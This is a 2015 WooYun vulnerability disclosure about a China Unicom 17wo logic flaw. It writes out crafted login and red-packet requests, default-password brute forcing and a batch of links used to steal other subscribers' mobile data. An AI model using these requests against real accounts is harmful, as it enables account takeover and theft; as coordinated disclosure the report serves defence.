当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153639

漏洞标题:中国联通17wo设计缺陷可批量自动化盗取他人流量(三个请求轻松搞定)

相关厂商:中国联通

漏洞作者: 北京方便面

提交时间:2015-11-11 18:46

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经确认,细节仅向厂商公开
2015-12-03: 细节向核心白帽子及相关领域专家公开
2015-12-13: 细节向普通白帽子公开
2015-12-23: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

中国联通17wo设计缺陷可批量自动化盗取他人流量(三个请求轻松搞定)

详细说明:

17wo可以向他人发送流量红包
【随机派发】那里前面验证了验证码,但是在最后一步却没验证,可以构造数据直接提交(需要登陆)。

http://**.**.**.**/FlowRedPacket!sendFlowRedPacket.action
data:packetAmount=1&sendFlowValue=1&mobile=18600815823&captcha_sj=123456


sendFlowValue为赠送流量数,单位M。
mobile=填写目标手机号
然后发现用户注册后密码默认为:123456,可以批量爆破。
经过测试构造可以构造两个请求达到批量盗取流量的效果:
第一步:

http://**.**.**.**/Login!process.action?mobile=18600815823&backurl=FlowRedPacket.action&password=123456&chk=&loginType=0&chkType=on


可以利用burp直接爆破并利用backurl跳转获取当前手机号流量

屏幕快照 2015-11-11 下午6.29.05.png


第二步:

http://**.**.**.**/Login!process.action?mobile=18600815823&backurl=FlowRedPacket!sendFlowRedPacket.action?packetAmount%3d1%26sendFlowValue%3d1%26mobile%3d18600827452%26captcha_sj%3d123456&password=123456&chk=&loginType=0&chkType=on


burp将第一步获取到的有流量的手机号作为第二步的目标手机号,将第一步获取到的流量值作为红包流量值(sendFlowValue)并抓取红包链接(例如:http://t.**.**.**.**/cu0afe),还是利用到了backurl

屏幕快照 2015-11-11 下午6.38.14.png


第三步:
带着你自己手机号登陆后的cookie批量去访问红包链接。

http://t.**.**.**.**/xCT7dh
http://t.**.**.**.**/qHDsvb
http://t.**.**.**.**/dj7Z2m
http://t.**.**.**.**/bxByy0
http://t.**.**.**.**/ZELNPs
http://t.**.**.**.**/Uo1PKS
http://t.**.**.**.**/QFHJqP
http://t.**.**.**.**/QCwmof
http://t.**.**.**.**/Q5BGfA
http://t.**.**.**.**/Q0QwZd
http://t.**.**.**.**/Pcl18r
http://t.**.**.**.**/NC2RVd
http://t.**.**.**.**/KNxPLW
http://t.**.**.**.**/KLUVwD
http://t.**.**.**.**/HekWzz
http://t.**.**.**.**/G0Qjqc
http://t.**.**.**.**/9OV0Mw
http://t.**.**.**.**/83RNLi
http://t.**.**.**.**/5XV5vT
http://t.**.**.**.**/2F8kqZ


自动化访问就不演示了,这里我们访问一个测试下:

屏幕快照 2015-11-11 下午6.42.29.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 北京方便面@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-23 10:47

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT向中国联合网络通信集团有限公司通报,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价

  1. 2015-11-11 19:26 | hecate ( 普通白帽子 | Rank:720 漏洞数:108 | ®高级安全工程师 | WooYun认证√)

    话说北京方便面里只有一包调料……

  2. 2015-11-11 21:48 | 刘海哥 ( 普通白帽子 | Rank:115 漏洞数:29 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    可恶!